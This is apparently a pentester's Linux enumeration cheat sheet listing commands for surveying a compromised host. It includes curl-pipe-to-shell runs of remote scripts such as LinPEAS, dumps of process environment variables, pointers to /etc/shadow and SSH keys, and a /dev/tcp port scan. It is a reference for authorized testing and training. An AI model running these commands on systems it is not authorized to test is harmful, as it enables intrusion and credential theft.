Enum
Things to do
Basic enum
# First things to check
id # Whoami & groups
cat /etc/issue /etc/os-release # OS
uname -a # Always check online for CVE
cat /etc/passwd # Users
cat /etc/fstab # Mount points
ps faxwu | cat # Processes tree
lscpu # Architecture
cat /etc/shells # Available shells
cat /etc/group|grep -v ':$' # Group with members
getent group sudo # sudo members
# System activity
lastlog
w
# System services and installations
dpkg -l | cat # Installed packages
systemctl --type=service | cat # List services
# Network
ss -lapunte | cat
netstat -ntlp | cat
ip a
ip route
route
routel
cat /etc/iptables/rules.v4
iptables -L
arp -a
# Files
ls -ltrha / /opt /srv /home/* /root/
ls -ltrha /tmp /var/tmp /dev/shm
ls -ltrha /var/www/*
find /home/ -type f -printf '%T@ %p\n' | sort -nr | head -20 # Recent files
find /home/ -type f -printf '%T@:%TY-%Tm-%Td %TH:%TM %p\n'|sort -n|cut '-d:' -f2-
find /home/ -type f -size +0
find /home -type f -size +0 -name ".*" -exec ls -l {} \; 2>/dev/null # Hidden files
find /home -type d -name ".*" -ls 2>/dev/null # Hidden dirs
sudo -l # if you need TTY : python3 -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null # Find all user SUID binaries
find / -perm -6000 -exec ls -ldb {} \; 2>/dev/null # Find all group SUID binaries
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; # Capabilities
find / -perm -u=s -type f 2>/dev/null
find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null
mount
lsblk
find / -writable -type d 2>/dev/null
cat ~/.bashrc
/usr/sbin/getcap -r / 2>/dev/null
cat /etc/fstab | grep -v "#" | column -t # Unmounted File Systems
# Env by process
cd /proc/ ; for i in [0-9]* ; do echo -e "\n## $i $(ps -fp $i 2>/dev/null)" ; cat $i/environ 2>/dev/null | tr '\0' '\n' | strings ; done
# Crons
ls -lah /etc/cron*
crontab -l
grep "CRON" /var/log/syslog
# App armor status
aa-status
# Modules
lsmod
/sbin/modinfo interestingmodule
Scripts
LinPEAS
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
LinEnum
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
SUID Enum
Enum SUID program with python2/3 built-in modules
curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python
Watch Process
Watch for existing and new process
Interesting Files
Public
#
/etc/issue
/etc/passwd
/etc/group
Root
#
/etc/sudoers
/etc/shadow
/etc/master.passwd # OpenBSD
/var/spool/cron/crontabs/*
/var/spool/cron/*
User
#
/home/*/.bash_history
/home/*/.ssh/*
Auditd (adm)
When parsing audit logs you may encounter hex encoded data
for VAR in cmd data ; do
for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do
echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat)
done
done
Scan Ports
Retrieve hidden ports without scanner/netstat
bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null
Binaries
When you encounter binaries without knowing what it does you can use strace to list system calls
strace binaryname